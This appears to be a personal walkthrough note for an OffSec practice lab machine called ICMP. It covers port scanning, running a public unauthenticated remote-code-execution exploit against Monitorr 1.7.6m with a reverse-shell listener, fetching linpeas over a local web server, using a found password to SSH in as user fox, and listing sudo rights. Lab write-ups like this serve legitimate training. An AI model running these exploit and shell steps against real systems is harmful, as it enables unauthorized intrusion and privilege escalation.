IP

Offsec - ICMP - Nov 4th 2023

Offsec - ICMP - Nov 4th 2023

Given Target [LAB_IP]

rustscan [LAB_IP] 22/tcp open ssh syn-ack 80/tcp open http syn-ack

nmap -sC -sV -p22,80 [LAB_IP] -oN icmp.nmap -v

dirbuster

http://[LAB_IP]

Monitorr software on home page v 1.7.6m

searchsploiut found searchsploit monitorr 10:26:23 Monitorr 1.7.6m - Authorization Bypass | php/webapps/48981.py Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) | php/webapps/48980.py Shellcodes: No Results Papers: No Results

Target url: http://[LAB_IP]/mon/

python3 48980.py http://[LAB_IP]/mon/ [LAB_IP] 4444

got em

![[Pasted image 20231104122952.png]]

[HASH_REDACTED]

Priv Esc

No curl for linpeas non donwnload

download method

python -m http.server 80

wget http://[LAB_IP]/linpeas.sh
chmod +x linpeas.sh

Not normally vuln.

Strange file in Fox's desktop ![[Pasted image 20231104124120.png]]

seems to be an encrypted password with "da" as the decrypt key

BUHNIJMONIBUVCYTTYVGBUHJNI , da //de seems to be the encrypt key

ssh fox@[LAB_IP]

tried it and it seems it's his password

now I'm him

![[Pasted image 20231104124622.png]]

Finally actually have a password

$ sudo -l [sudo] password for fox: Matching Defaults entries for fox on icmp: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin User fox may run the following commands on icmp: (root) /usr/sbin/hping3 --icmp * (root) /usr/bin/killall hping3